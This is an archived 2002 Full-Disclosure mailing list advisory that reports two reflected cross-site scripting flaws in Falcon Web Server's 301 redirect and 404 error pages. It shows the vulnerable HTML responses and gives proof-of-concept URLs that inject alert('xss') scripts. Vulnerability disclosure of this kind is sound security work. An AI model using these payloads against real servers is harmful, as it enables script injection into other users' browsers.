[Full-Disclosure] Cross-Site Scripting Issues in Falcon Web Server

• Previous message: Mike Caudill: "[Full-Disclosure] Re: [VulnWatch] iDEFENSE Security Advisory: iSCSI Default Configuration File Settings"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

From Developer:

"Falcon Web Server is running under Windows NT/2000/XP as well as Windows
95/98. It supports ISAPI and WinCGI, and it is a fully  functional web
server which is capable of running a small / medium scale website of about
50-80 hits per minute.  The real advantage of Falcon Web Server is the
ability to run on a desktop computer with almost the same functionality as
large-scale web servers like MS IIS and Apache."

A lack of input sanitation in the error message output of this server makes
it susceptible to two cross-site scripting vulnerabilities:

* An issue in the way the server handles 301 messages when a file is not
found, and the request is not terminated by a slash.  Falcon simply adds a
slash to the request URI, and sends back a 301 with the following entity:

<html><head><title>/<SCRIPT>alert("xss")</SCRIPT>/</title></head><body>Redir
ecting browser to <a
href="/<SCRIPT>alert("xss")</SCRIPT>/">/<SCRIPT>alert("xss")</SCRIPT>/</a><b
r>If nothing happens click the link above.</body></html>

* An issue in the way the server handles 404 messages when a file/folder is
not found, and the necessary slash has been added (entity below):

<html><head><title>HTTP/1.0 404 Not
Found</title></head><body><h1>/<SCRIPT>alert("xss")</SCRIPT>/index.html Not
Found</h1><p>Cannot locate the requested file.</body></html>

Examples:

* 301 Message XSS

Closing TITLE tag:
http://localhost/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A HREF:
http://localhost/%22%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A tag:
http://localhost/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

* 404 Message XSS

http://localhost/%3cscript%3ealert(%22xss%22)%3c/script%3e/

The 301 examples will simply add a slash and pass it on to the browser,
which then raises a 404, exploiting that vulnerability as well (although the
301 exploits will cause some useless HTML to be added on)

"The reason the mainstream is thought
of as a stream is because it is
so shallow."
                     - Author Unknown

_______________________________________________
Full-Disclosure - We believe in it.
Full-Disclosureat_private
http://lists.netsys.com/mailman/listinfo/full-disclosure

• Next message: Matthew Murphy: "Cross-Site Scripting Issues in Falcon Web Server"
• Previous message: Mike Caudill: "[Full-Disclosure] Re: [VulnWatch] iDEFENSE Security Advisory: iSCSI Default Configuration File Settings"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Aug 08 2002 - 17:01:03 PDT